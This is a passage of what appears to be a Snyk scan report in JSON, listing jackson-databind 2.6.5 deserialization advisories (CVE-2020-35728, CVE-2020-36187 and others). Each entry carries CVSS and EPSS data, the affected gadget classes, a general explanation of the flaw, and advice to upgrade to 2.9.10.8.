process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2999)\n- [Medium Post](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-35728)\n", + "epssDetails": { + "percentile": "0.80006", + "probability": "0.00674", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-35728" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-12-27T14:34:18.527699Z", + "functions_new": [ + { + "version": [ + "[2.0.0, 2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-12-27T14:05:38Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-12-27T17:34:55Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.852735Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056414", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.093517Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:01.748169Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.768509Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.SharedPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/3e8fa3beea49ea62109df9e643c9cb678dabdde1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36187" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T12:47:33.579319Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T12:44:41Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33.970819Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:23.768509Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056416", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2998", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Al1ex/CVE-2020-36184", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.169091Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:47.820867Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.700251Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp2.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2998)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Al1ex/CVE-2020-36184)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36184" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:02:15.197495Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:25Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:33Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.700251Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056417", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2997", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.214306Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.757857Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.695573Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.tomcat.dbcp.dbcp.datasources.PerUserPoolDataSource`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2997)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36186" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:05:16.831143Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:00:26Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34.206083Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:51:24.695573Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [ + false, + "com.fasterxml.jackson.core:jackson-databind@2.9.10.8" + ], + "isUpgradable": true, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-1056418", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.9.10.8)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.9.10.8" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/Al1ex/CVE-2020-36179", + "title": "Al1ex's Poc" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/3004", + "title": "GitHub Issue" + }, + { + "url": "https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:59:37.249724Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:23.867743Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.705041Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. The package mishandles the interaction between serialization gadgets and typing, related to `org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.10.8 or higher.\n## References\n- [Al1ex's Poc](https://github.com/Al1ex/CVE-2020-36179)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/3004)\n- [Medium Article](https://cowtowncoder.medium.com/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.66225", + "probability": "0.00262", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-36180" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2021-01-07T13:08:29.105792Z", + "functions_new": [ + { + "version": [ + "[,2.9.10.8)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2021-01-07T13:05:51Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2021-01-07T16:40:34Z", + "severityBasedOn": 